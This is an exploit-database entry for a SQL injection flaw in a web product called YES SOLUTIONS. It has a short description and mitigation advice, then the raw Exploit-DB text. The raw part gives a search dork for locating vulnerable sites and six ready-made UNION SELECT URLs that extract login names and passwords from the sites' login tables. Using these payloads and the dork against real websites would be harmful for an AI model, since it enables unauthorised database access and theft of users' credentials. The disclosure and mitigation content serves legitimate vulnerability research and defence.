SQL Injection Vulnerability in YES SOLUTIONS

vendor:

YES SOLUTIONS

by:

HackXBack

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: YES SOLUTIONS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

SQL Injection Vulnerability in YES SOLUTIONS

SQL Injection vulnerability exists in YES SOLUTIONS which allows an attacker to inject malicious SQL queries into the vulnerable web application. This vulnerability can be exploited by sending malicious SQL queries to the vulnerable web application. The malicious SQL queries can be used to extract sensitive information from the database such as usernames and passwords. The vulnerable parameter is the ‘id’ parameter which can be exploited by sending malicious SQL queries to the vulnerable web application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

####################################################################
.:. Author : HackXBack [h-b@usa.com] Lebanese Hacker

.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : YES SOLUTIONS [http://www.yessolutions.biz/files/index.php]

.:. Bug Type : Sql Injection
.:. Dork : "Powered by: Yes Solutions"

####################################################################

===[ Exploit ]===

http://server/path/file.php?id=null[SQL]





===[ Example ]===

http://site.com/files/services.php?id=-34%20union%20select%201,2,concat%28login,0x3a,password%29,4,5,6+from+login_table+where%20login_id=1

http://site.com/latest_news.php?id=-3%20union%20select%201,group_concat%28username,0x3a,password%29,3,4,5,6,7,8+from+login

http://site.com/files/company.php?cat_id=-2%20union%20select%201,group_concat%28Login_Name,0x3a,Password%29,3,4,5,6,7,8+from+login_table

http://site.com/files/product_detail.php?item_id=-122%20union%20select%201,2,3,group_concat%28Login_Name,0x3a,Password%29,5,6,7,8,9+from+login_table

http://site.com/files/product.php?cat_id=-29 union select 1,group_concat(login,0x3a,password),3,4,5,6,7+from+login_table

http://site.com/files/detail.php?id=34&page_id=-3%20union%20select%201,group_concat%28login,0x3a,password%29,3,4,5,6+from+login_table











####################################################################